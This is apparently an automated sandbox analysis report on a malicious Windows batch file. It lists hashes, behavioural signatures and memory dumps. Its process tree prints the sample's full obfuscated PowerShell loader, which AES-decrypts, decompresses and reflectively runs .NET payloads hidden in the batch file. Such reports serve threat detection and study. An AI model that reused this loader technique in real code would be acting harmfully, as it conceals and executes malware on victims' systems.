Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 14:18
Static task
static1
Behavioral task
behavioral1
Sample
Fanta_Is_Better_Than_Coke.bat
Resource
win7-20240221-en
4 signatures
150 seconds
General
-
Target
Fanta_Is_Better_Than_Coke.bat
-
Size
773KB
-
MD5
4dec8ae835e5a08a2a49caed42ec3d03
-
SHA1
d980406271e2404a1bba3aa0db370cca9f37c284
-
SHA256
8d65586e976036fdd9baff1a531782c4dfc03b18e681f7d28a3b971375c08d51
-
SHA512
802bf400411973dec2975a0154cea60f0461bd78999a4d1be0b73e786b8a4be803caf0ffc67d0986b98c7bdf8d33ccd6ec16b708a82c3091df61df88706aa224
-
SSDEEP
24576:WLYRF4zDL03jn4gzvZnOOGZj1rlUMaM2o2oa:WLMrj3ONpOo8
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2860 wrote to memory of 2284 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2284 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2284 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 1636 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 1636 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 1636 2860 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HJMqH6hNcuL5hS+vmBgSUwLnZDRraZ4uSSHQzk2uV5k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7+Z22IkUOZ2XEDFGjqVWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QqOLA=New-Object System.IO.MemoryStream(,$param_var); $wWAsy=New-Object System.IO.MemoryStream; $bEzcd=New-Object System.IO.Compression.GZipStream($QqOLA, [IO.Compression.CompressionMode]::Decompress); $bEzcd.CopyTo($wWAsy); $bEzcd.Dispose(); $QqOLA.Dispose(); $wWAsy.Dispose(); $wWAsy.ToArray();}function execute_function($param_var,$param2_var){ $KEgbT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $prFBz=$KEgbT.EntryPoint; $prFBz.Invoke($null, $param2_var);}$PYOpj = 'C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat';$host.UI.RawUI.WindowTitle = $PYOpj;$cvJhI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PYOpj).Split([Environment]::NewLine);foreach ($xMZXI in $cvJhI) { if ($xMZXI.StartsWith('QBmdPhNhdFQSpIxMPXIo')) { $FLIWZ=$xMZXI.Substring(20); break; }}$payloads_var=[string[]]$FLIWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1636-4-0x000007FEF5C2E000-0x000007FEF5C2F000-memory.dmpFilesize
4KB
-
memory/1636-5-0x000000001B650000-0x000000001B932000-memory.dmpFilesize
2.9MB
-
memory/1636-8-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB
-
memory/1636-9-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB
-
memory/1636-7-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB
-
memory/1636-11-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB
-
memory/1636-10-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB
-
memory/1636-6-0x00000000022D0000-0x00000000022D8000-memory.dmpFilesize
32KB
-
memory/1636-12-0x000007FEF5970000-0x000007FEF630D000-memory.dmpFilesize
9.6MB